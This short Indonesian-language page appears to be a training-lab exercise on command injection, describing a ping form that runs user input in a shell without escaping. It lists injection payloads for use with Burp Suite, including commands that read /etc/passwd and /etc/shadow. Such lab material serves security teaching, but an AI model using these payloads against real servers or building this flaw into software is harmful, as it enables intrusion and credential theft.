Command Injection
Form diagnostic jaringan yang menjalankan perintah sistem dari input pengguna. Tidak ada filtering karakter berbahaya.
Network Diagnostic Tool
Masukkan alamat IP atau hostname untuk di-ping. Perintah akan dieksekusi langsung di server.
$ ping 192.168.1.1
Kerentanan: Command Injection — Input disambung langsung ke perintah shell tanpa escaping. Karakter seperti
; | && ` bisa memisahkan perintah. Dengan Burp Suite, intercept dan inject di parameter target:
127.0.0.1; cat /etc/passwd Semicolon separator
127.0.0.1 && whoami AND chain
127.0.0.1 | ls -la Pipe
`cat /etc/shadow` Command substitution
$(whoami) Modern substitution